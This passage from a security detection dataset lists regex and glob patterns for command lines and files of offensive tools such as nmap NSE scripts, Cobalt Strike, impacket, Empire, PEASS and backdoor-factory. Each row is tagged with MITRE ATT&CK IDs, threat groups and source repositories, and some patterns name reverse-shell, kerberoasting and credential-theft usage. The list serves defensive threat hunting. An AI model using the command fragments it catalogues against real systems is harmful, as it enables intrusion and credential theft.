http-vulners-regex.nse*",".{0,1000}\shttp\-vulners\-regex\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/vulnersCom/nmap-vulners","1","0","N/A","N/A","10","3124","534","2024-04-03T11:53:29Z","2017-12-19T21:21:28Z" "* http-vuln-misfortune-cookie.nse*",".{0,1000}\shttp\-vuln\-misfortune\-cookie\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-vuln-wnr1000-creds.nse*",".{0,1000}\shttp\-vuln\-wnr1000\-creds\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-waf-detect.nse*",".{0,1000}\shttp\-waf\-detect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-waf-fingerprint.nse*",".{0,1000}\shttp\-waf\-fingerprint\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-webdav-scan.nse*",".{0,1000}\shttp\-webdav\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-wordpress-brute.nse*",".{0,1000}\shttp\-wordpress\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-wordpress-enum.nse*",".{0,1000}\shttp\-wordpress\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-wordpress-users.nse*",".{0,1000}\shttp\-wordpress\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-xssed.nse*",".{0,1000}\shttp\-xssed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -I *.bin * -Loader dll*",".{0,1000}\s\-I\s.{0,1000}\.bin\s.{0,1000}\s\-Loader\sdll.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "* -i -H * -P * -s reverse_shell_tcp -a -u .moocowwow*",".{0,1000}\s\-i\s\-H\s.{0,1000}\s\-P\s.{0,1000}\s\-s\sreverse_shell_tcp\s\-a\s\-u\s\.moocowwow.{0,1000}","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3252","785","2023-10-30T14:13:32Z","2013-05-30T01:04:24Z" "* -i havex.profile *",".{0,1000}\s\-i\shavex\.profile\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - 
T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","0","N/A","10","10","570","110","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "* -i portscan445.gnmap -o shares_found.txt*",".{0,1000}\s\-i\sportscan445\.gnmap\s\-o\sshares_found\.txt.{0,1000}","offensive_tool_keyword","SMBCrunch","SMBCrunch allows a red teamer to quickly identify Windows File Shares in a network - performs a recursive directory listing of the provided shares and can even grab a file from the remote share if it looks like a juicy target.","T1021.002 - T1005 - T1210","TA0001 - TA0002 - TA0003 - TA0009","N/A","N/A","Lateral Movement","https://github.com/Raikia/SMBCrunch","1","0","N/A","9","2","162","26","2018-03-07T15:50:12Z","2016-03-25T10:10:19Z" "* -i snmp-ips.txt -c community.txt*",".{0,1000}\s\-i\ssnmp\-ips\.txt\s\-c\scommunity\.txt.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. 
Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","0","N/A","N/A","5","470","85","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z" "* -i -t hiphp:latest*",".{0,1000}\s\-i\s\-t\shiphp\:latest.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "* iat_obfuscation.exe*",".{0,1000}\siat_obfuscation\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "* iax2-brute.nse*",".{0,1000}\siax2\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* iax2-version.nse*",".{0,1000}\siax2\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* icap-info.nse*",".{0,1000}\sicap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* icebreaker.py*",".{0,1000}\sicebreaker\.py.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "* id_reverse-ssh.pub*",".{0,1000}\sid_reverse\-ssh\.pub.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 
","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","N/A","10","10","875","126","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z" "* -Identity * -Set @{serviceprincipalname='*'}*",".{0,1000}\s\-Identity\s.{0,1000}\s\-Set\s\@\{serviceprincipalname\=\'.{0,1000}\'\}.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Targeted kerberoasting by setting SPN","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -Identity * -XOR @{useraccountcontrol=4194304*",".{0,1000}\s\-Identity\s.{0,1000}\s\-XOR\s\@\{useraccountcontrol\=4194304.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Targeted kerberoasting we need ACL write permissions to set UserAccountControl flags for the target user. Using PowerView","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* iec-identify.nse*",".{0,1000}\siec\-identify\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* iis_controller.py*",".{0,1000}\siis_controller\.py.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","525","123","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" "* ike-version.nse*",".{0,1000}\sike\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -im amass -ir *",".{0,1000}\s\-im\samass\s\-ir\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "* -im get-dns-records*",".{0,1000}\s\-im\sget\-dns\-records.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "* -im github-get-repositories*",".{0,1000}\s\-im\sgithub\-get\-repositories.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 
- TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "* -im google-get-linkedIn-employees*",".{0,1000}\s\-im\sgoogle\-get\-linkedIn\-employees.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "* -im grep-through-commits*",".{0,1000}\s\-im\sgrep\-through\-commits.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "* -im massdns*",".{0,1000}\s\-im\smassdns.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "* imaohw*",".{0,1000}\simaohw.{0,1000}","offensive_tool_keyword","powershell","powershell obfuscations techniques observed by malwares - reversed net user","T1027 - T1059.001","TA0005 - TA0002","Qakbot","N/A","Defense Evasion","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* imap-brute.nse*",".{0,1000}\simap\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* imap-capabilities.nse*",".{0,1000}\simap\-capabilities\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* imap-log4shell.nse*",".{0,1000}\simap\-log4shell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE scripts to check against log4shell or LogJam vulnerabilities (CVE-2021-44228). NSE scripts check most popular exposed services on the Internet. It is basic script where you can customize payload. Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Diverto/nse-log4shell","1","0","N/A","N/A","4","349","49","2021-12-20T15:34:21Z","2021-12-12T22:52:02Z" "* imap-ntlm-info.nse*",".{0,1000}\simap\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* impacket *",".{0,1000}\simpacket\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Fileless Lateral Movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","0","N/A","10","10","1331","230","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" "* impacket*",".{0,1000}\simpacket.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* impacket*",".{0,1000}\simpacket.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "* impacket.*",".{0,1000}\simpacket\..{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "* impacket/*",".{0,1000}\simpacket\/.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* --impersonate Administrator -shell *",".{0,1000}\s\-\-impersonate\sAdministrator\s\-shell\s.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "* -impersonate* 
-hashes*",".{0,1000}\s\-impersonate.{0,1000}\s\-hashes.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/SecureAuthCorp/impacket/blob/master/examples/getST.py","1","0","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "* Impersonate.exe *",".{0,1000}\sImpersonate\.exe\s.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "* impersonate.py *",".{0,1000}\simpersonate\.py\s.{0,1000}","offensive_tool_keyword","impersonate","A windows token impersonation tool","T1134 - T1550","TA0004 - TA0003","N/A","N/A","Lateral Movement","https://github.com/sensepost/impersonate","1","0","N/A","10","3","257","33","2023-04-19T12:53:50Z","2022-10-28T06:30:02Z" "* -ImpersonateUser *",".{0,1000}\s\-ImpersonateUser\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* ImplantSSP.exe*",".{0,1000}\sImplantSSP\.exe.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "* import Exrop*",".{0,1000}\simport\sExrop.{0,1000}","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation 
tools","https://github.com/d4em0n/exrop","1","0","N/A","N/A","3","277","27","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" "* import LinpeasBaseBuilder*",".{0,1000}\simport\sLinpeasBaseBuilder.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "* import LinpeasBuilder*",".{0,1000}\simport\sLinpeasBuilder.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "* import PEASLoaded*",".{0,1000}\simport\sPEASLoaded.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "* import PEASRecord*",".{0,1000}\simport\sPEASRecord.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "* Import tokens from other tools 
